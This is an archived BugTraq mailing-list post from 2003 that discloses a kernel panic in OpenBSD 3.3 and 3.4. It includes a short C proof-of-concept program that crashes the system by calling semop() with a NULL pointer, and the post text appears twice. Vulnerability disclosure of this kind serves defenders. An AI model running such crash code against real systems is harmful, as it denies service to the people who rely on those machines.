BugTraq
Back to list
|
Post reply
yet another panic() in OpenBSD
Nov 21 2003 10:46PM
noir uberhax0r net
(1 replies)
a project lacking the basic QA and unit testing and here is the outcome:
#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>
int
main()
{
int i;
for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
PANIC in OpenBSD 3.3 and 3.4 is confirmed.
[ reply ]
Re: yet another panic() in OpenBSD
Nov 22 2003 10:39PM
Henning Brauer (henning openbsd org)
(1 replies)
Re: yet another panic() in OpenBSD
Nov 24 2003 06:29PM
Coleman Kane (cokane cokane org)
Privacy Statement
Copyright 2010, SecurityFocus
a project lacking the basic QA and unit testing and here is the outcome:
#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>
int
main()
{
int i;
for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
PANIC in OpenBSD 3.3 and 3.4 is confirmed.
[ reply ]